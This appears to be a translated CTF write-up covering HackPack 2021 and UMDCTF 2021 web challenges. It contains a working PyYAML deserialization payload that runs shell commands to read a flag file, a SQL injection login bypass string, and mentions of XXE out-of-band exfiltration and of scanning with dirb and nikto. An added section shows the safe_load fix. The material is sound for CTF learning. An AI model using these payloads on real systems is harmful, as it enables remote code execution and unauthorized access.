HackPack CTF 2021

Yaml-2-Json


I didn't see the hint!

Reference: A Brief Look at the PyYAML Deserialization Vulnerability


It's right there in the environment variables! tmp/flag.txt is the problem: accessing it gives a 500.


Oh!

Sweet, so let’s go for RCE and read our flag from the server

I used the following payload at first, but it fails since subprocess will only accept single commands like whoami or id

user_input: !!python/object/apply:subprocess.check_output ['cat /tmp/flag.txt']

My teammate Koimet helped me refine my payload to the following which gives us the flag

user_input: !!python/object/apply:subprocess.check_output
  args: [ cat /tmp/flag.txt ]
  kwds: { shell: true }
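Why the Yaml-2-Json service is exploitable and how to close the hole, as an added example (not the challenge's or the author's code). It assumes PyYAML is installed and uses a constructed document with a harmless builtins.sorted tag in place of the subprocess payload above.

```python
"""Added example (not the challenge's own code): the PyYAML unsafe-loader risk
behind Yaml-2-Json and the `yaml.safe_load` fix. Assumes PyYAML is installed."""
import json
import yaml

# Constructed YAML document. The tag tells PyYAML's unsafe loader to import
# `builtins` and call `sorted([3, 1, 2])`; the challenge payload above uses the
# very same mechanism with `subprocess.check_output`.
TAGGED_DOC = "user_input: !!python/object/apply:builtins.sorted [[3, 1, 2]]"


def yaml_to_json_unsafe(doc: str) -> str:
    """The vulnerable pattern: yaml.Loader honours !!python/* tags, so the
    document, not the service, decides which Python callable runs."""
    return json.dumps(yaml.load(doc, Loader=yaml.Loader))


def yaml_to_json_safe(doc: str) -> str:
    """Hardened version: SafeLoader knows only the core YAML types and rejects
    every !!python/* tag with a ConstructorError before anything is called."""
    return json.dumps(yaml.safe_load(doc))


def rejects_python_tag(doc: str) -> bool:
    """Return True if the hardened converter refuses the document."""
    try:
        yaml_to_json_safe(doc)
    except yaml.constructor.ConstructorError:
        return True
    return False


if __name__ == "__main__":
    # The callable ran: {"user_input": [1, 2, 3]}
    print(yaml_to_json_unsafe(TAGGED_DOC))
    # True: safe_load refuses the tag instead of executing it
    print(rejects_python_tag(TAGGED_DOC))
```

Plain documents convert identically under both loaders; only the tagged one is refused, which is the whole change a yaml-to-json endpoint needs.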


Indead v2

It's XXE + Docx.

But mine had a small problem: it couldn't read the file directly, so I exfiltrated it out-of-band through an error message.

UMDCTF 2021

The Matrix

Feels like robot User-Agent spoofing!

But why doesn't it work?!

Googlebot User Agents


It has a 303 redirect! 🙄🙄🙄

No wonder it kept failing!

Return of the Flag Bay

SQL injection


But there's one odd thing: I don't know how the backend is written.

admin: anything
password: 1'/**/or/**/1%23
works!
But
admin: adminaaaaa'/**/or/**/1%23
password: anything
doesn't work!

The Matrix Revolutions

Turns out you scan directories with dirb! It's an overseas site; didn't expect that.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/4/20 11:03
# @Author : upload
# @File : mrctf.py
# @Software: PyCharm

import requests
import re

url = 'http://chals5.umdctf.io:4002/'
flag = ''

if __name__ == '__main__':
    # Each numbered path returns one fragment of the flag; concatenate them in order.
    for i in range(0, 30):
        new_url = url + str(i)
        print(new_url)
        r = requests.get(url=new_url).text
        # Stop once a path returns an HTML document instead of a flag fragment.
        if re.findall('<!DOCTYPE.*?', r):
            break
        flag += r
    print(flag)

Top of the Charts

Damn it!

I think the success has gone to its head.

The -I option sends a HEAD request to the server and then prints the HTTP headers the server returns.

$ curl -I https://www.example.com

So that's what "Top" in the title meant! 🙄🙄🙄

nikto -h http://chals5.umdctf.io:4003

nikto is a vulnerability scanner; it is rarely used in China.

IOT Project

Look at the project history: the change descriptions recorded in the commits.
